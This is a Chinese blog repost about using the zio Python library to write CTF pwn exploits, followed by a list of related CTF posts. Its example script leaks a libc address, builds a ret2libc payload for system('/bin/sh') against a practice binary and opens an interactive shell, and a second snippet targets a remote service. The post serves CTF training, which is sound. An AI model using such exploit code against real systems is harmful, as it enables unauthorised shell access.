CTF中的EXP编写技巧 zio库的使用

最新推荐文章于 2024-04-12 09:48:06 发布
转载 最新推荐文章于 2024-04-12 09:48:06 发布 · 655 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/Ox9A82/p/5475815.html
文章标签:

#shell

本文介绍如何使用zio库进行PWN攻击,包括本地和远程目标的连接方式,利用ROP技术构造payload,以及如何与获得的shell进行交互等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

zio库没有提供文档

这个是官方给出的一个例子程序

 1 from zio import *
 2 io = zio('./buggy-server')
 3 # io = zio((pwn.server, 1337))
 4 
 5 for i in xrange(1337):
 6     io.writeline('add ' + str(i))
 7     io.read_until('>>')
 8 
 9 io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
10 io.read_until('A' * 49)
11 libc_base = l32(io.read(4)) - 0x1a9960
12 libc_system = libc_base + 0x3ea70
13 libc_binsh = libc_base + 0x15fcbf
14 payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
15 io.write('info ' + payload + "\nshow\nexit\n")
16 io.read_until(">>")
17 # We've got a shell;-)
18 io.interact()

可以做本地和远程的切换

 1 from zio import *
 2 
 3 if you_are_debugging_local_server_binary:
 4     io = zio('./buggy-server')            # used for local pwning development
 5 elif you_are_pwning_remote_server:
 6     io = zio(('1.2.3.4', 1337))           # used to exploit remote service
 7 
 8 io.write(your_awesome_ropchain_or_shellcode)
 9 # hey, we got an interactive shell!
10 io.interact()

总结一下

zio (('127.0.0.1',3389), timeout = 9999)

连接到ip的端口

zio('./pwn1') 加载本地文件

 

writeline('abc') 发送字符串

write(‘abc') 发送字符串

 

read_until('hello') 直到收到字符串

read(4) 接收

l32()   4byte

l64()   8byte

interact()与shell交互

转载于:https://www.cnblogs.com/Ox9A82/p/5475815.html

*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3286
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址。解决方法为构造重叠的chunk,从而改到tcach
基于zio编写PWN代码
ChuMeng1999的博客
12-09 2130
目录预备知识一、CTF PWN基础知识二、zio简介1.导入zio2.与远程服务器建立网络连接3.从远程服务器读取数据4.向远程服务器发送数据5.与服务器建立shell交互三、pip四、checksec脚本实验目的实验环境实验步骤一实验步骤二实验步骤三 预备知识 一、CTF PWN基础知识 《CTF PWN进阶训练》系列实验要求实验者已经了解如下相关的基础知识,包括: 1.理解基本的汇编指令及语句; 2.掌握IDA Pro的基本用法; 3.熟悉网络编程(socket)基本原理; 4.编写简单的Python
zio-process:一个简单的ZIO,用于与外部流程和命令行程序进行交互
02-13
齐奥过程 | 概括 基于ZIO的纯功能命令和过程。 文献资料 贡献 行为守则 参见 支持 来和我们聊天 。 执照
CTF-Internetwache2016-exp-RemotePrinter
iextract的博客
04-22 458
CTF-Internetwache2016-exp-RemotePrinter 自今天开始在csdn记录下有些感想或是某些解题过程。以前只在csdn查询、下载资料,没有想到记录。 Ps:心态爆炸,这个笔记本动一下卡7秒是什么鬼哦查看给出的二进制文件,file RemotePrinter check.sh --file RemotePrinter RemotePrinter: ELF 3
某比赛渗透测试阶段后门的EXP
热门推荐
单核CPU的小朋友的博客
11-19 3万+
由于最近有人问我要上次后门的exp,所以我今天就了一份。 使用了python中的pwn模块。没有的小伙伴们可以使用命令安装一下 pip install pwn 主要思路还是根据后门返回结果来使用remote函数来连接后门,具体操作和南邮CTF的PWN题的exp也差不多,只是多了些返回结果而已。需要多做一些操作。我顺便放出getflag.c的源码,以便各位测试使用。 getflag.c #...
CTF-Misc实战技巧:从入门到精通的完整指南
06-03
CTF竞赛中的Miscellaneous(杂项)题目是考察选手综合安全技能的重要环节,涉及隐术、编码分析、流量分析等多种技术。本文将系统介绍CTF-Misc类题目的解题思路和实用技巧,帮助安全爱好者提升实战能力。 --- CTF-...
CTF超详细资源合集
06-14
在传统的CTF线上⽐赛中,Web类题⽬是主要的题型之⼀,相较于⼆进制、逆向等类型的题⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问题,不需具特别强的编程能⼒,故⼊门较为容易。Web类题⽬常见的漏洞类型...
工匠杯-CTF(题目+exp+解题思路)
04-01
在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、...
国密SM2实战:CTF中椭圆曲线参数错误的签名伪造技巧.pdf
06-16
从隐术到编码转换,从音频隐文件结构分析,CTF-Misc 教会你用技术的眼睛发现数据中的「彩蛋」。掌握 Stegsolve、CyberChef、Audacity 等工具,合法破解摩斯密码、二维码、LSB 隐,在虚拟战场中提升网络安全...
条形码数据隐CTF中Code128编码的校验位篡改技巧.pdf
最新发布
06-16
从隐术到编码转换,从音频隐文件结构分析,CTF-Misc 教会你用技术的眼睛发现数据中的「彩蛋」。掌握 Stegsolve、CyberChef、Audacity 等工具,合法破解摩斯密码、二维码、LSB 隐,在虚拟战场中提升网络安全...
CTF工具 searchexploit - exp数据.mht
12-13
CTF工具 searchexploit - exp数据.mht
2021-07-25
m0_57291352的博客
07-25 910
[XNUCA2018]Warmup 题目 Buggy_Server.py from Crypto.Util.number import bytes_to_long, getPrime from random import randint from gmpy2 import powmod import sys p = getPrime(1024) q = getPrime(1024) N = p*q Phi = (p-1)*(q-1) with open("flag", 'r') as fr: flag
zio(pwn)
weixin_51758733的博客
07-19 259
zio
探索ZIO:一款强大的Scala异步
gitblog_00009的博客
04-12 508
探索ZIO:一款强大的Scala异步 zio A cross-platform abstract/virtual filesystem framework with many built-ins filesystems for .NET 项目地址: https:...
网络安全中的POC、EXP、Payload、ShellCode_网络安全payload是什么意思
Innocence_0的博客
11-01 1300
POC:概念证明,即概念验证(英语:Proof of concept,简称POC)是对某些想法的一个较短而不完整的实现,以证明其可行性,示范其原理,其目的是为了验证一些概念或理论。在计算机安全术语中,概念验证经常被用来作为0day、exploit的别名。EXP:利用(英语:Exploit,简称EXP)一般指可利用系统漏洞进行攻击的动作程序。Payload:中文 ’ 有效载荷 ',指成功exploit之后,攻击代码释放的具有攻击能力的能够实现攻击者目的的代码。
.exp文件_CTF文件上传及文件包含粗略总结
weixin_39619433的博客
11-22 696
文件上传】一、前端检查前端对文件后缀进行检查,该种通过抓包修改数据包即可解决二、文件名检查(1)大小绕过在windows下,可以将后缀为pHp(2)unicode当目标存在json_decode且检查在json_decode之前,可以将php为\u0070hp(3)php3457该项为apache专属关键点在/etc/apache2/mods-available/php5.6.c...
网络安全常用术语
m0_61506558的博客
08-06 2780
黑客(hacker)对计算机技术非常擅长的人,窃取数据、破坏计算机系统白帽子白帽子的目的是发现企业的漏洞并且上报给企 业,帮助其解决风险问题360补天、漏洞盒子、CNVD、CNNVD3. 红帽黑客有正义感、爱国的黑客。利用技术维护国家网络 安全,并且对外来的攻击进行反击4.漏洞漏洞指的是硬件、软件、协议等等存在的安全缺陷5.POC能证明漏洞存在的代码6. expExploit执行了这一段利用代码之后,就能够达到攻击的目的msf7. payload(攻击载荷)SQL。...
编写poc和exploit的几款常用工具介绍
koozxcv的博客
06-12 1万+
1.pwntools pwntools是一个CTF框架和漏洞利用开发,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。 pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。 sudo pip install pwntools即可安装
python zioctf常用函数
Volcano
12-17 4786
zio没有给官方的说明文档导入:from zio import *本地和远程连接都是: zio(本地程序名称或者远程IP和端口号) 连接远程的时候还可以设置超时时间比如:zio('./pwn') zio('127.0.0.1',4000) zio(('127.0.0.1',4000),timeout=10000000000)转换函数:l32()和l64()读取和发送:read() read_un
ctf中如何编写脚本
12-11
CTF(Capture The Flag)竞赛中,编写脚本是一个非常重要的技能。脚本可以帮助选手自动化解决一些重复性高、复杂度低的任务,从而提高解题效率。以下是一些编写CTF脚本的基本步骤和技巧: ### 1. 选择合适的编程语言 常用的编程语言有Python、Perl、Bash等。Python因其简洁易用和强大的支持,常被CTF选手使用。 ### 2. 分析问题 在编写脚本之前,首先要分析题目,理解题目的要求和给出的信息。确定需要解决的问题类型,如密码破解、数据解析、网络请求等。 ### 3. 编写脚本 根据分析结果,编写相应的脚本。以下是一些常见的脚本编写步骤: #### a. 处理输入输出 读取题目给出的输入数据,处理后输出结果。 ```python import sys def main(): input_data = sys.stdin.read() # 处理输入数据 result = process(input_data) print(result) def process(data): # 数据处理逻辑 return "Processed data" if __name__ == "__main__": main() ``` #### b. 网络请求 使用`requests`进行HTTP请求,或使用`socket`进行低级别的网络通信。 ```python import requests def fetch_url(url): response = requests.get(url) return response.text if __name__ == "__main__": url = "http://example.com" content = fetch_url(url) print(content) ``` #### c. 密码破解 使用`hashlib`进行哈希计算,或使用`itertools`生成可能的密码组合。 ```python import hashlib def crack_hash(hash_value, algorithm): with open("wordlist.txt", "r") as file: for line in file: password = line.strip() hashed = hashlib.new(algorithm, password.encode()).hexdigest() if hashed == hash_value: return password return None if __name__ == "__main__": hash_value = "5d41402abc4b2a76b9719d911017c592" algorithm = "md5" password = crack_hash(hash_value, algorithm) print(f"Password: {password}") ``` ### 4. 测试和调试 在本地环境中测试脚本,确保其按预期工作。使用调试工具和日志输出帮助定位和解决问题。 ### 5. 优化 根据需要优化脚本,提高其效率和可读性。 ### 6. 文档和注释 编写清晰的文档和注释,方便自己和他人理解和使用脚本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值